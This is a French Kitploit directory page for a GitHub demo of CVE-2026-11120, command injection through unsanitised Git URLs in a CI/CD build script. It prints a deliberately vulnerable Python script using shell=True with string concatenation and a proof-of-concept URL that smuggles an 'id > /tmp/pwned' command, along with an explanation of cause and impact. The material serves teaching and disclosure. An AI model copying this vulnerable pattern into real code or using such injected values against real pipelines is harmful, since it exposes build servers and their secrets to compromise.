Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Démontre l'injection de commandes via des URL Git non désinfectées dans les pipelines CI/CD, y compris un script de build vulnérable et un exemple d'exploit pour une CVE critique. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
Analyse des VulnérabilitésExploitationDevSecOpsApprentissage et Éducation
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Démontre l'injection de commandes via des URL Git non désinfectées dans les pipelines CI/CD, y compris un script de build vulnérable et un exemple d'exploit pour une CVE critique.

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-11120 – Injection de commande via l'URL Git dans le pipeline CI/CD

Code du programme (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Injection de commande via l'URL Git dans un pipeline CI/CD

Severity: Critical

Aperçu

Un script de pipeline CI/CD utilise des URL de dépôt Git fournies par l'utilisateur sans les assainir dans une commande shell. Un attaquant peut injecter des commandes shell en incluant des caractères spéciaux (par exemple ;, &&) dans l'URL, ce qui conduit à l'exécution arbitraire de commandes sur le serveur de build.

Détails de la vulnérabilité

  • Type : Injection de commande
  • Impact : Compromission de l'infrastructure de build, fuite de secrets.
  • Cause racine : L'URL du dépôt est concaténée directement dans une commande shell sans échappement ni validation.

Démonstration de l'exploitation

Exécutez le script vulnérable :

root@kitploit:~
python cicd_build.py

Il exécute la commande id injectée, créant /tmp/pwned.

Télécharger l’outil